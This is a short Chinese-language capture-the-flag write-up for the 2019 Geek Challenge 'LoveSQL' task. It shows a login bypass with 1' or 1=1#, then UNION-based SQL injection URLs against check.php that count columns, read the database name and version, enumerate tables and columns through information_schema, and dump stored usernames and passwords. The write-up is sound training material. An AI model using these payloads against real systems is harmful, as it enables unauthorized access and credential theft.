开启环境以后注意到有两个框,方向确定是sql,这样的话先试试万能密码好了:
用户名:1' or 1=1#
密码:#随意输入就好
出来了一串乱码,尝试解码以后发现什么都不是,接下来尝试不断注入:
/check.php?username=admin' order by 3%23&password=1 存在
/check.php?username=admin' order by 4%23&password=1 报错
可以知道一共出现三个字段。尝试'union'查询测试注入好了:
/check.php?username=1' union select 1,2,3%23&password=1
回显点位为2和3,当前数据库名及版本查看一下:
/check.php?username=1' union select 1,database(),version()%23&password=1
当前数据库为geek,那报表就好了:
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
得到flag:
flag{841f45c9-3871-4b28-af0e-cd992fbc4673}
标签:username,极客,23,union,LoveSQL,2019,password,check,php From: https://www.cnblogs.com/TagLmtCtf/p/18066724